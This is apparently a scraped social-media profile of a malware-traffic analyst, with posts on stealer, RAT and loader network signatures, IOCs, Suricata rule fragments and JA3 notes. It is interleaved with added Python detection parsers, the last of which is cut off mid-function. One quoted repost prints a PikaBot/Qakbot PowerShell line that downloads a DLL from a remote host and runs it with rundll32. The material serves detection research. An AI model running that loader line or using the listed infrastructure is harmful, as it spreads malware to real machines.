Jane

@Jane_0sint

2,275
Followers
325
Following
611
Media
1,463
Statuses

Network traffic numismatist 🔎

Joined February 2010
@Jane_0sint
Jane
11 months
#Phishing 🔖Regular expression to identify suspicious domain names
@Jane_0sint
Jane
1 year
Friends👋While we are celebrating our seventh anniversary, Win 7/8/10/11 x64 is available to everyone without a subscription!🎉Have a good hunting!😼
@Jane_0sint
Jane
1 year
#AgentTesla binary file inside Jpeg image -> retrieved by PS.Loader script⏬
@Jane_0sint
Jane
9 months
👩‍🍳 And again, a delicious recipe from me personally! 😋 Bon appetit my friends!
@anyrun_app
ANY.RUN
9 months
📌 Another malware campaign employs images with #stego Let's take a look at this sample ➡️ The #malware employs #steganography in several stages: 1️⃣ The modified "Google Update" app downloads multiple PE files and an image containing a DLL 2️⃣TrueUpdate,
@Jane_0sint
Jane
1 year
Stealer unknown to me👩‍💻 🐧Kowalski, analysis! - Objects extremely greedy! 77.105.147[.]140:15666 (TCP)
@Jane_0sint
Jane
1 year
UnkStealer🤷‍♀️ There is TitanStealer activity on these addresses, but the traffic structure and so on is very different from it. And the port is not 5000. 94.142.138[.]139 77.91.77[.]35 94.142.138[.]145 94.142.138[.]10 Ports: 5001/5005 Any ideas?
@Jane_0sint
Jane
1 year
🧙‍♀️How do I use the magic spell number 8000167 to find samples exfiltrating data via Telegram✨ 👩‍💻Works on all plans for all subscribers @anyrun_app 1 - Go to Filter🔍 2 - Type SID (8000167)⌨️ 3 - Get a list of samples📜 💡Hunting rules sids can also be taken from @ET_Labs
@Jane_0sint
Jane
10 months
🤹‍♀️My way to process a QR code is to pass the link via the clipboard and all in one task⤵️
@anyrun_app
ANY.RUN
10 months
Here’s how you can analyze a phishing link hidden inside a QR code: 1. Open the Static discovering window in ANYRUN 2. Click on the QR icon 3. Submit the link for analysis 4. Launch the task Here’s a sample you can use 👉
@Jane_0sint
Jane
1 year
Gurcu Stealer 💸 Sending a wsr report using the PUT method to an ip address.
@Jane_0sint
Jane
1 year
🧙‍♀️Did you know that network rules from contain some magic?✨For example, Telegram exfiltration is now not a simple certificate detection🔏Adding a little potion, allowed the spell with the number 8000167 to work with TLS packets🪄I hope you like my magic💫
@Jane_0sint
Jane
1 year
PikaBot ♠️ DLL Loader 📲 URI CrazyPCRE 😝 Pattern Checker ~98% Checked on GitHub IOC`s + Sandboxes
@pr0xylife
proxylife
1 year
#Pikabot - #Qakbot - BB19 - .html > url > .js > .ps > .dll wscript.exe LL.js $Mag = ( https://hanika-inc[.]com/mjnPR9/uo ) foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll rundll32 $env:TEMP\Sulfuryl.dll,LS88 IOC's
@Jane_0sint
Jane
1 year
RedLine 📈Stealer 🦝 News ⌨️ A combination of changes in MC-NMF protocol values that does not allow detection by network rules. Capturing a second authorization packet (green 218b) would be nice.
@Jane_0sint
Jane
1 year
STEALER [] PennyWise [sid:8000014] Recent sample activity🗓️ 🤡 🙀
@Jane_0sint
Jane
1 year
ObserverStealer 🦝 Seek and destroy🎸
@Jane_0sint
Jane
1 year
Havoc is a modern and malleable post-exploitation command and control framework. - SSL - MITM
@Jane_0sint
Jane
9 months
🚪Backdoor [RU] tekst 🐻 Js Stager ↔️ RegRead/RegWrite ↔️ Base64(PS script) 🛠️Uses the Windows registry as storage
@Jane_0sint
Jane
9 months
LOADER [] DarkGate Suspicious DNS TXT response Thank you!
@Unit42_Intel
Unit 42
9 months
2023-12-07 (Thursday) - PDF file found on VirusTotal led to #DarkGate infection - Windows shortcut retrieved DarkGate install script from DNS TXT record - activity may have started as early as 2023-11-27 - IOCs available at #TimelyThreatIntel #Wireshark
@Jane_0sint
Jane
1 year
SHELLCODE [] ShellCodeLoader (Gh0stCringe) 3076 bytes - > - pe exe -> Gh0st
@Jane_0sint
Jane
9 months
📂OpenSMB share \\89.23.98.22\LN\ POLICY [] Query an Executable file via SMB2 from an external server
@Cyber0verload
匚ㄚ乃乇尺ㄖᐯ乇尺ㄥㄖ卂ᗪ
10 months
#POVERTYSTEALER #GOVUA #VBS #SSU DOC: d12934-0202334.doc MD5: eac138b49c6f90896c9af5cbc8fe38b8 DNS: npddocs[.]com IP: 194[.]31.109.82 RTI: hxxps://npddocs[.]com/ssu.gov.ua/docs/file/util/0/d12934-0202334[.]doc Next-Stage: \\89.23.98[.]22\LN\Konstantin.exe @500mk500
@Jane_0sint
Jane
1 year
⚡️Update STEALER [] Win32/ #Stealc 💥Fully detonated sample ->
@Jane_0sint
Jane
1 year
STEALER [] PovertyStealer -> ETopen More samples by link⏫⏫⏫ And also by tag⏬⏬⏬ #PovertyStealer #stealer #malware
@Jane_0sint
Jane
1 year
💀SheetRat 💀 Packet for detection -> Dword(Len(Ping))+Gzip(Ping)
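Added example, not code from the post above: build and validate the SheetRat frame the post describes, Dword(Len(Ping)) + Gzip(Ping). Two assumptions are mine: the DWORD is little-endian (the post does not say), and "Len" is the plaintext length, which is also what the gzip trailer's ISIZE field records, so the two can be cross-checked before bothering to inflate anything.

```python
"""SheetRat-style framing: 4-byte length prefix followed by a gzip member.
Endianness and the 'length of plaintext' reading are assumptions, see lead-in."""
import gzip
import struct
import zlib

GZIP_MAGIC = b"\x1f\x8b"


def build_frame(message: bytes) -> bytes:
    """Frame one message as described: Dword(Len(message)) + Gzip(message)."""
    return struct.pack("<I", len(message)) + gzip.compress(message, mtime=0)


def parse_frame(frame: bytes) -> tuple[int, bytes]:
    """Validate and unpack a frame; raises ValueError on anything inconsistent."""
    if len(frame) < 4 + 18:  # 4-byte prefix + smallest gzip member (10 header + 8 trailer)
        raise ValueError("frame too short")
    declared = struct.unpack_from("<I", frame, 0)[0]
    body = frame[4:]
    if not body.startswith(GZIP_MAGIC):
        raise ValueError("no gzip magic at offset 4")
    # ISIZE: last 4 bytes of a gzip member, uncompressed length mod 2**32, little-endian.
    isize = struct.unpack_from("<I", body, len(body) - 4)[0]
    if isize != declared:
        raise ValueError(f"length prefix {declared} != gzip ISIZE {isize}")
    message = gzip.decompress(body)
    if len(message) != declared:
        raise ValueError("decompressed length does not match prefix")
    return declared, message


def looks_like_sheetrat(frame: bytes) -> bool:
    """Structural detector: prefix/ISIZE agreement plus a gzip body that inflates."""
    try:
        parse_frame(frame)
        return True
    except (ValueError, OSError, EOFError, zlib.error):
        return False


if __name__ == "__main__":
    f = build_frame(b"Ping")
    print(f.hex(), parse_frame(f))
```

The prefix/ISIZE comparison is the cheap check: a generic "length + gzip" framing would normally carry the compressed length, so a prefix that equals the inflated size is the distinguishing detail here.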
@Jane_0sint
Jane
1 year
👁️ ObserverStealer 👁️ Unmasking the New Contender in Cyber Crime Reported by @cyberhust1er 💻
@Jane_0sint
Jane
8 months
🫦The elaboration of #DarkGate is impressive (again;) 💵There is a focus on more expensive assets (RDP, LSASS), which is why the rental price is so high. 🕵️‍♀️Now DNS traffic and standard ports. 👋Of course, this is no longer the 2351 port on which I found 223 public tasks
@anyrun_app
ANY.RUN
8 months
📌 DarkGate: new script delivery action via DNS #DarkGate v5, a multifunctional #loader , now has advanced modules, allowing it to gain the initial access to organizations' infrastructure inside the perimeter, potentially expanding the scope of its victims. ⚙ Its initiation
@Jane_0sint
Jane
1 year
🎧Collection of musical payloads🎧 #opendir Player in the sandbox💿 http://5.42.66[.]3/fabric/
@Jane_0sint
Jane
11 months
Based on a regular expression, I wrote a rule to detect similar suspicious domains. 🆕PHISHING [] Generic Phishing domain observed in TLS SNI 💡Use the filter to search by rule number [sid:8001050] 🫶Good luck!
@Jane_0sint
Jane
11 months
#Phishing 🔖Regular expression to identify suspicious domain names
@Jane_0sint
Jane
1 year
Another sample was found based on a comparison of bigrams and autocorrelations of server responses from traffic. The backdoor was previously described by @xme in the blog <- (online)
@Jane_0sint
Jane
3 years
[BACKDOOR] TinyNuke [VNC] 💥 VNC Socket Magic word - "MELTED" C:\Users\Demone\Desktop\HVNC-main\_bin\Release\Win32\Client.pdb 👿 👩‍🚒
@Jane_0sint
Jane
2 years
#Botnet #Orchard 🥭🍑🍎🍒 The first packet is 4 bytes long.
@Jane_0sint
Jane
1 year
An example of a really reliable JA3 hash, which very rarely falsely works due to a very strange set of clienthello fields, and if you also add a !443 port, as is often the case with #Remcos , it detects very well✨
@anyrun_app
ANY.RUN
1 year
#Remcos version 3.x primarily focuses on TLS communication Let's take a closer look at its JA3 hash. The combination of ClientHello fields is shown in the attached images. When calculated in decimal values, it amounts to: 771,4865,51-43-13-10,25-24-23-21-19-16, And if hashed
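Added example, not ANY.RUN's or the author's code: compute a JA3 string and hash from a raw TLS ClientHello, dropping GREASE values, and reproduce the fingerprint string quoted above. The ClientHello below is constructed from the fields in the post (771, cipher 4865, extensions 51-43-13-10, groups 25-24-23-21-19-16, no ec_point_formats extension); it is not taken from a Remcos capture, and the GREASE values mixed into it are there only to show they are ignored.

```python
"""JA3 from a ClientHello, plus the 'rare JA3 and not port 443' heuristic from the post."""
import hashlib
import struct

PAGE_JA3_STRING = "771,4865,51-43-13-10,25-24-23-21-19-16,"


def is_grease(v: int) -> bool:
    """GREASE values (RFC 8701) are 0x?a?a with both bytes equal; JA3 ignores them."""
    return (v >> 8) == (v & 0xFF) and (v & 0x0F) == 0x0A


def ja3_string(version, ciphers, extensions, curves, point_formats) -> str:
    def fmt(vals):
        return "-".join(str(v) for v in vals if not is_grease(v))
    return ",".join([str(version), fmt(ciphers), fmt(extensions), fmt(curves), fmt(point_formats)])


def ja3_hash(s: str) -> str:
    return hashlib.md5(s.encode("ascii")).hexdigest()


def ja3_from_client_hello(record: bytes) -> str:
    """Parse a TLS record carrying a ClientHello and return its JA3 string."""
    if len(record) < 9 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = struct.unpack_from(">H", body, 0)[0]
    pos = 2 + 32                                  # legacy_version, then client random
    pos += 1 + body[pos]                          # session id
    cs_len = struct.unpack_from(">H", body, pos)[0]
    pos += 2
    ciphers = [struct.unpack_from(">H", body, pos + i)[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                          # compression methods
    extensions, curves, point_formats = [], [], []
    if pos + 2 <= len(body):
        ext_end = pos + 2 + struct.unpack_from(">H", body, pos)[0]
        pos += 2
        while pos + 4 <= ext_end:
            etype, elen = struct.unpack_from(">HH", body, pos)
            pos += 4
            data = body[pos:pos + elen]
            pos += elen
            extensions.append(etype)
            if etype == 10 and len(data) >= 2:    # supported_groups
                n = struct.unpack_from(">H", data, 0)[0]
                curves = [struct.unpack_from(">H", data, 2 + i)[0] for i in range(0, n, 2)]
            elif etype == 11 and len(data) >= 1:  # ec_point_formats
                point_formats = list(data[1:1 + data[0]])
    return ja3_string(version, ciphers, extensions, curves, point_formats)


def build_client_hello(version, ciphers, extensions, curves, point_formats=()) -> bytes:
    """Constructed ClientHello carrying only the fields JA3 reads; other extensions are empty."""
    body = struct.pack(">H", version) + bytes(32) + b"\x00"
    body += struct.pack(">H", 2 * len(ciphers)) + b"".join(struct.pack(">H", c) for c in ciphers)
    body += b"\x01\x00"
    exts = b""
    for et in extensions:
        if et == 10:
            data = struct.pack(">H", 2 * len(curves)) + b"".join(struct.pack(">H", c) for c in curves)
        elif et == 11:
            data = bytes([len(point_formats)]) + bytes(point_formats)
        else:
            data = b""
        exts += struct.pack(">HH", et, len(data)) + data
    body += struct.pack(">H", len(exts)) + exts
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs


def remcos_hit(ja3: str, dst_port: int, expected_ja3: str) -> bool:
    """The post's heuristic: the rare JA3 plus a destination port other than 443."""
    return ja3 == expected_ja3 and dst_port != 443


if __name__ == "__main__":
    ch = build_client_hello(771, [0x2A2A, 4865], [0x1A1A, 51, 43, 13, 10],
                            [0x3A3A, 25, 24, 23, 21, 19, 16])
    s = ja3_from_client_hello(ch)
    print(s, ja3_hash(s))
```

The trailing comma in the page's string is not a truncation: there is no extension 11 in the list, so the point-formats field is legitimately empty.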
@Jane_0sint
Jane
3 years
[STEALER] Collector ♻ FYI @ET_Labs let's compare the http headers of these two examples. The first (earlier) is matched by rule number 2841213 (Babulya Stealer) The second (later) one is matched by rule number 2843697 (Spy.Agent.PYU)
@Jane_0sint
Jane
1 year
🤲I will share another find of a stealer written in Go😼 🤷‍♀️And as always, your attribution versions are welcome! HTTP traffic is slightly described, partially decoded in the screenshot.
@Jane_0sint
Jane
3 years
[STEALER] Loki
@Jane_0sint
Jane
1 year
#Rootteam Stealer and a future version of Windows👾 🕵️‍♀️Look in User-Agent : Windows NT 123.9⚡️ Now covered by the rules🔧 Just in case, I made a rule for JSON, if the version continues to grow😅
@Jane_0sint
Jane
11 months
#Lumma #LummaC2 #LummaStealer 🆕STEALER [] Win32/Lumma Stealer Check-In 🆕STEALER [] Win32/Lumma Stealer Exfiltration @g0njxa 🤍 @AnFam17
@Jane_0sint
Jane
8 months
*ੈ✩‧₊ 🐸 - Bot 🤝 ♠️- Bot ✩‧₊˚ Now I have an excellent reason to remember what JARM is 🥳 ⚠️There are some regular expressions in the post, but beware of false positives! Guys, thank you very much for the inspiration! @embee_research @g0njxa
@anyrun_app
ANY.RUN
8 months
📌 Comparison of QakBot and PikaBot servers configuration #QakBot is a malware loader and initial access tool. It was active until August and suddenly appeared in mid-December 2023. #PikaBot malware has a modular structure including a loader and a core with a Shell backdoor,
@Jane_0sint
Jane
1 year
⚙️Here is another implementation of decrypting a 200-byte packet from the server. ⚡️If anyone did not know, the @ #Cyberchef has an option with storage in registers. 🔍look in the flow control section
@anyrun_app
ANY.RUN
1 year
#Tofsee is a veteran botnet that is still in service Tofsee utilizes a one-byte encryption algorithm using a slightly modified Output Feedback (OFB) scheme with plaintext feedback. This algorithm is used for the first packet from the server, which contains key information for
@Jane_0sint
Jane
1 year
clipper-socket 94.142.138.119:45245 DDR: UserAgent: mfo4engo2m
@Jane_0sint
Jane
3 years
[PAYLOAD] Encoded PE EXE or DLL Windows file 🗄 Binary variant. Obfuscating files by converting to strings of zeros and ones. MZ => 0️⃣1️⃣0️⃣0️⃣1️⃣1️⃣0️⃣1️⃣ 0️⃣1️⃣0️⃣1️⃣1️⃣0️⃣1️⃣0️⃣ 🧛‍♀️
@Jane_0sint
Jane
11 months
🖊️Signed BANKER [] Win32/Metamorfo CnC Checkin
@Jane_0sint
Jane
3 years
[REMOTE] Remcos.RAT 🐙 Example of a custom protocol containing plaintext. Usually TCP packets are encrypted with RC4🔐 Newer versions can already accept TLS🔑 === Yellow - Magic + Size Red - Command Aquamarine - Delimiter === 🧛‍♀️🍷
@Jane_0sint
Jane
3 years
[REMOTE] Remcos v.3.2 TLS 1.3 (Client Hello static bytes) Suricata`s rule fragment: stream_size: client, =, 161; content: "|1603 0300 9b01 0000 9703 03|"; depth: 11; content: "|0000 0213 0101 0000 6c00 3300 4700 4500 1700 4104|"; distance: 32; within: 20;
@Jane_0sint
Jane
3 years
[STEALER] Vidar ⚔ (modified) Old(black) and New(gray) Server Response📤 Change grabber module -> Archive structure 📩 GET /freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll, vcruntime140.dll 💅
@Jane_0sint
Jane
1 year
HZRat ⚡️ Activity Report: Samples: 🟩 IOC: 47.100.65.182 🟩 113.125.92.32 111.203.161.31
@Jane_0sint
Jane
1 year
⭐️ RisePro Stealer v0.1 (TCP) ⭐️ "Old, but not obsolete"🦾🤖 ... and v.1.0(HTTP) traffic for comparison v0.1 -> 🐍 194.169.175.128:50500 v1.0 -> 🪱 108.174.199.249:80 Decoder:
@Jane_0sint
Jane
3 years
[STEALER] Vertex (New) HTTP GET <http_method "GET" with http_client_body, UA and HTTP Headers>🙄
@Jane_0sint
Jane
1 year
#Cyberchef is extremely handy for creating not so simple decoders. ⚙️Check out my new decoder for the #Lumma configuration received from C2. Only the recipe🔽 📡It's enough just to add the base64 data from the C2 connection to the input field.
@anyrun_app
ANY.RUN
1 year
The #LummaStealer malware can receive a configuration from the C&C server. The configuration is encrypted with a 32-byte XOR key, then encoded in Base64, and provided on request at the /c2conf URI. Here is a #Lumma sample: Use our #CyberChef recipe to
@Jane_0sint
Jane
1 year
🔐CryptBot🤖 There could be quite a lot of text here, but the most paradoxical evidence is noted in the photo 📸 Search by #cryptbot tag 🔍-> file[] - is waiting for rule📯)) DGA reminded me of one sample that I called $CREEN ->
@Jane_0sint
Jane
1 year
A simple and rarely seen example of extracting data stolen by a #lokibot , not that it's a big deal, but it might come in handy for someone💁‍♀️
@anyrun_app
ANY.RUN
1 year
#LokiBot is one of the most enduring credential stealers. On ANYRUN, the first tag for LokiBot was applied on March 6, 2018, making it one of the first public submissions. 🟥 - The aPLib compression algorithm is used to compress the decoded exfiltrated data and credentials from
@Jane_0sint
Jane
10 months
#Sidewinder #apt [+] Network Traffic link: SHA-256: fa86b5bc5343ca92c235304b8dcbcf4188c6be7d4621c625564bebd5326ed850 Duser.dll rekeywiz.exe
@Jane_0sint
Jane
11 months
👩‍🍳Also check out my new cyberchef recipe:
@anyrun_app
ANY.RUN
11 months
📌The 'Eternity Project' encompasses #malicious software distributed via a #MaaS (Malware-as-a-Service) model. 🕵️‍♀️ Let's examine the network traffic generated by #Ethernity #Clipper to understand its protocol and behaviors. This malicious software is designed to replace the
@Jane_0sint
Jane
1 year
Infected RMSRemoteAdmin🤦‍♀️Protection through insult 😆 ETPRO Win32/RA-based.NLR (edit required) Drops XOR-ed 0x0A MSI container⏏️ http://82.117.253[.]5/next/ http://172.86.123[.]220/api/ to be continued...
@Jane_0sint
Jane
3 years
[SPYWARE] #Hancitor HTTP POST features <variables + separator for user and computer name>
@Jane_0sint
Jane
3 years
[STEALER] RedLine FYI🌸 RedLine uses MC-NMF protocol. Parsing handshake(in imgs). Payload is located in the Via Record section. <Version Record + Mode Record + Via Record + Known Encoding Record> 🌸to be continued...
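Added example, not the author's parser: walk the .NET Message Framing ([MC-NMF]) preamble that the post above says RedLine's handshake uses, Version Record + Mode Record + Via Record + Known Encoding Record, through to Preamble End, and pull out the Via URI that the post points at. Record layouts follow the public [MC-NMF] spec; the sample preamble is constructed here, and net.tcp://198.51.100.10:1912/ is a documentation-range placeholder, not an IOC. The same parsing applies to the MC-NMF changes mentioned in the earlier RedLine post.

```python
"""MC-NMF preamble parser: Version (0x00), Mode (0x01), Via (0x02), Known Encoding (0x03),
Preamble End (0x0C). Sizes use the spec's 7-bits-per-byte variable-length encoding."""
from urllib.parse import urlsplit

MODES = {1: "SingletonUnsized", 2: "Duplex", 3: "Simplex", 4: "SingletonSized"}
ENCODINGS = {0: "UTF8/SOAP1.1", 1: "UTF16/SOAP1.1", 2: "UnicodeFFFE/SOAP1.1",
             3: "UTF8/SOAP1.2", 4: "UTF16/SOAP1.2", 5: "UnicodeFFFE/SOAP1.2",
             6: "MTOM", 7: "Binary", 8: "BinaryWithInBandDictionary"}
REC_VERSION, REC_MODE, REC_VIA, REC_KNOWN_ENCODING, REC_PREAMBLE_END = 0x00, 0x01, 0x02, 0x03, 0x0C


def encode_size(n: int) -> bytes:
    """Variable-length size: low 7 bits first, 0x80 set on every byte but the last."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def decode_size(buf: bytes, pos: int):
    """Return (value, position after the size field)."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos
        if shift > 35:
            raise ValueError("size encoding too long")


def build_preamble(via: str, mode: int = 2, encoding: int = 8) -> bytes:
    """Constructed preamble: version 1.0, Duplex, Via, binary-with-dictionary, Preamble End."""
    via_b = via.encode("utf-8")
    return (bytes([REC_VERSION, 1, 0]) + bytes([REC_MODE, mode])
            + bytes([REC_VIA]) + encode_size(len(via_b)) + via_b
            + bytes([REC_KNOWN_ENCODING, encoding]) + bytes([REC_PREAMBLE_END]))


def parse_preamble(buf: bytes) -> dict:
    """Walk records until Preamble End; an unknown record type aborts parsing."""
    out, pos = {}, 0
    while pos < len(buf):
        rec = buf[pos]
        pos += 1
        if rec == REC_VERSION:
            out["version"] = (buf[pos], buf[pos + 1])
            pos += 2
        elif rec == REC_MODE:
            out["mode"] = MODES.get(buf[pos], f"unknown({buf[pos]})")
            pos += 1
        elif rec == REC_VIA:
            n, pos = decode_size(buf, pos)
            out["via"] = buf[pos:pos + n].decode("utf-8")
            pos += n
        elif rec == REC_KNOWN_ENCODING:
            out["encoding"] = ENCODINGS.get(buf[pos], f"unknown({buf[pos]})")
            pos += 1
        elif rec == REC_PREAMBLE_END:
            out["preamble_end"] = True
            break
        else:
            raise ValueError(f"unexpected record type 0x{rec:02x} at offset {pos - 1}")
    return out


def via_endpoint(via: str):
    """Scheme, host and port from the Via URI, the field the post singles out."""
    u = urlsplit(via)
    return u.scheme, u.hostname, u.port


if __name__ == "__main__":
    p = build_preamble("net.tcp://198.51.100.10:1912/")
    print(p.hex())
    print(parse_preamble(p), via_endpoint(parse_preamble(p)["via"]))
```

Because the Via length is variable-length encoded, a rule that anchors on the URI must not assume a fixed offset after the 0x02 record byte; URIs longer than 127 bytes push it one byte further.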
@Jane_0sint
Jane
11 months
👺ABANTES [ Ransomware / Locker ]
@Jane_0sint
Jane
10 months
☕️ Caffeine 🐭 Mickey 🎣 Phishing
@Jane_0sint
Jane
1 year
This malware reuses some traffic elements of the family, but there are some differences ⚖️
@anyrun_app
ANY.RUN
1 year
How do we detect #Arkei Stealer in traffic The configuration received from the server contains: 🟩 - Token 🟥 - Target application switches and a profile (migrated from #Vidar ) 🟪 - Values from multipart data as indicators of exfiltration via HTTP POST (different from Vidar)
@Jane_0sint
Jane
3 years
[STEALER] Hancitor 🕵️‍♂️ The encoded version contains the same variables as in the previously detected samples🧷 The request to identify the external IP address was also preserved untouched👈 Let's tweak our rules! 🔧 @ET_Labs ✍👧👍
@Jane_0sint
Jane
3 years
[REMOTE] #MysterySnail 🐌 Initial TCP Payload Structure (Example) <Size + Session ID + Command ID> Have a good hunting! 👀
@Jane_0sint
Jane
3 years
[RANSOMWARE] Philadelphia🏘 HTTP Check-In features✅ 🤑👩‍⚖️☹
@Jane_0sint
Jane
1 year
🎯Track external SMB traffic according to the rule number 8000547 💻Do as I do in the screenshot and see the results. 💡Hint, in most cases it will be Storm-0978 CVE-2023-36884
@Jane_0sint
Jane
10 months
⚠️“Caffeine” Phishing Service Domains Now tagged as Caffeine by MRxC0DER details in the article -> 🔍Previous @anyrun_app submissions are filtered by rule number [8001156] 📌There is a suspicious substring: LOG - on the login entry form and PAS - on the
@Jane_0sint
Jane
1 year
GoodMorning 💸 Ransomware ⚡️ Not sure about stolen🤔
@Jane_0sint
Jane
1 year
⚡️Now covered in rules BACKDOOR [] #JanelaRAT BX RAT -⚙️-> JanelaRAT "With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat."(c)⏬
@zscaler
Zscaler
1 year
Explore the depths of cyber intrigue with our latest ThreatLabz blog on the emerging JanelaRAT variant. In it, we unveil its tactics for targeting LATAM’s financial sector, its cunning use of dynamic C2 infrastructure, and more. Read here:
@Jane_0sint
Jane
3 years
[STEALER] Snake Keylogger 🐍 Exfiltration passwords by email📧 Suspicious subject and decoded attachment message 📎 👩‍🔧
@Jane_0sint
Jane
11 months
↩️Redirecting via www[.]bing[.]com/ck/ to spear phishing by adding a direct link ➡️ to a suspicious myisp[.]cc which ends up redirecting ➡️to the login page✅
@Jane_0sint
Jane
1 year
🔊DynamicRAT⚡️ Thanks a lot for the report!!! Once I tortured him in the sandbox for 800 seconds 🕓 and saw reactions on the network to my activity⌨️😅🖱️ ⬇️Here are some links⬇️
@Gi7w0rm
Gi7w0rm
1 year
New #BlogPost : It seems @tosscoinwitcher and I have discovered a previously undocumented #Java -based #RAT . Dupped #DynamicRAT , the #malware has a vast array of features. Read all about it the discovery process here: #CyberSecurity #infosec #networktamper
@Jane_0sint
Jane
3 years
[STEALER] RedF0xx (New)🦊 == Nitro.Gen.Stealer == Full header order matching + hardcoded boundary elements "--8d9"🔩 URN, zip file name format and file names inside the archive are different🔧 🦸‍♀️
@Jane_0sint
Jane
3 years
[STEALER] Nitro HTTP Post Request Header🧸 🤦‍♀️Odd number of characters in a boundary HEX string. 🔒Static bytes in the boundary "8d9" 🎀
@Jane_0sint
Jane
10 months
📜This story is about how I used those guys' non-working SQL server to get to the UBoat source code🔤 🤭Although you can just search on Github) lol 💁‍♀️But I didn’t know what it was then⁉️ 🧙‍♀️The moral is: Error tracing is sometimes useful💋
@anyrun_app
ANY.RUN
10 months
📌 UBoat - HTTP Botnet Project Communicates with the C2 server through HTTP requests that contain victim information in the URI: Receives payload download responses. For example, #LucaStealer ➡️ To gather additional evidence, let's delve into the error
@Jane_0sint
Jane
10 months
🧻Skoch Grabber 🤭 This code uses Blank Grabber as the template.
@Jane_0sint
Jane
1 year
STEALER [] Luca stealer Sid: 8000581 8000582
@g0njxa
Who said what
1 year
An unknown #stealer has been spotted on YT! C2 ⚙️ http://146.71.81.144/ Cookie Stealer, File Grabber, Crypto wallets, Password managers and Screenshots, everything POST to C2 Take a look!👇👇 Just uploaded to VT
@Jane_0sint
Jane
3 years
[RANSOMWARE] HiddenTear.Gen 😢 HTTP headers and Ransom Note🔪 The ransomware note is very similar to ✨
@petrovic082
Petrovic
3 years
#Ransomware .payme background
@Jane_0sint
Jane
1 year
✨Found an interesting backdoor for you. Thanks to the virus analysts at for the detailed report✨
@anyrun_app
ANY.RUN
1 year
🔍 New on our blog: #Gh0stBins RAT analysis. Gain insight into the rising #cyberthreat from China: 🇨🇳 🔹 Learn about its communication protocol 🔹 Check RDP stream recovery 🔹 Python scripts, YARA, and Suricata rules Check #malware analysis 👇
@Jane_0sint
Jane
11 months
👾 #lu0bot DNS pattern matching regular expression🔧 📖Details in the article⏬
@anyrun_app
ANY.RUN
11 months
Check out the #Lu0Bot malware analysis from ANYRUN! We cover the code overview, explain the deobfuscation process, YARA and Suricata rules, and show what sets this Node.js threat apart. ⬇️
@Jane_0sint
Jane
1 year
🤔"Poverty is the parent of crime." - Aristotle. C2 server returns a string with the command and address: givemedepspls #146.70.104.234 After that, the client forms a packet with service information and zip.
@Jane_0sint
Jane
9 months
💁‍♀️How do you like this stealer? 😵‍💫Who came up with the idea of calling folders that way? \Temp\YUOhtyugjKgdfgjFGghj676jj\ 🌩️It looks like the author was electrocuted while typing! 💡Let's come up with a name for it, I propose to call it ⚡️Electrocuted
@Jane_0sint
Jane
3 years
[REMOTE] #HiveRAT 🐝 Encrypted and Decrypted Check-In 🔐 There is no point in relying on a password. This chest opens differently 🔮
@Jane_0sint
Jane
1 year
#Hydrochasma Fast Reverse Proxy (APT) 🧾 Outbound TCP Stream Analysis: 🟦 - Custom Header 🟥 - Proxied TLS traffic
@Jane_0sint
Jane
2 years
#bluefox #stealer In this article I wrote the network part in Russian. There is a bit of magic in writing rules.✨✨✨
@Jane_0sint
Jane
1 year
I propose to read more about the threat in the following report 📖 And also participate in the 30-day #Formbook marathon from @malware_traffic 🏃
@anyrun_app
ANY.RUN
1 year
#FormBook network traffic Let's have a look at this #malware traffic and our focus will be the network exfiltration detection. Exfiltration requests are POSTs. The rules track the following: 🟩 - HTTP headers are custom and hard-coded 🟥 - Data is encrypted using RC-4 on SHA-1
@Jane_0sint
Jane
3 years
[SPYWARE] AgentTesla😎 Features of SMTP exfiltration💌 Compare with FTP exfiltration🗃 🧞‍♀️
@Jane_0sint
Jane
1 year
📆August is coming to an end, like the whole summer 🏖️ This month I wrote 120 rules and that's fine😎 In the fall, there is usually a lot of interesting things in cybersecurity, which means we will make detections together with you🤝 Thanks for the research!👍
@anyrun_app
ANY.RUN
1 year
📢 Catch up with ANYRUN updates in August - Config extractors for #Lu0Bot , #Strela and more #malware families - Added new and improved existing network rules - Contributed new rules to @EmergingThreats community Read more details in our blog 👇
@Jane_0sint
Jane
1 year
🐙 Win32/Remcos RAT Checkin 🐙 Fragment of a possible future rule: flow:established,to_server; content:"|BA 49 B2 3C 5E 7E 69 43 28 63 8E|"; startswith; content:"|39 84|"; distance:2; within:2; classtype:command-and-control; @ET_Labs 🙏
@Jane_0sint
Jane
11 months
🐢... slowly approached the Shellcode C:\Users\Administrator\Desktop\新语言\shellcode第二份\code\Debug\code.pdb
@Jane_0sint
Jane
11 months
💡Online sandboxes are often focused on certain regions 🌐For me, Asia covers 🔍Recently I found there an interesting version of #Gh0st [ Easy Language and VMprotect ] 💚 - comp/uncomp size 💙 - magic bytes ❤️ - zlib message
@Jane_0sint
Jane
11 months
🆕REMOTE [] Win32/Gh0stRat Activity ❤️ - Buffer sizes for packet and inflated data 💚 - Magic 💜 - zlib deflated Check-in #CyberChef - >
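Added example, not the author's rule or CyberChef recipe: a parser for the Gh0st packet layout the two posts above colour in, magic bytes, packet size and inflated size, then a zlib-deflated body. The classic 5-byte "Gh0st" magic is an assumption (variants swap it, so it is a parameter), and the packets below are constructed, not captured.

```python
"""Gh0st-family framing: <magic 5 bytes><packet size u32 LE><inflated size u32 LE><zlib data>."""
import struct
import zlib

HEADER_FMT = "<5sII"                       # magic, packet size incl. header, inflated size
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 13
DEFAULT_MAGIC = b"Gh0st"                   # assumed classic value; variants change it


def build_packet(plaintext: bytes, magic: bytes = DEFAULT_MAGIC) -> bytes:
    """Constructed packet: sizes filled from the real compressed/plain lengths."""
    comp = zlib.compress(plaintext)
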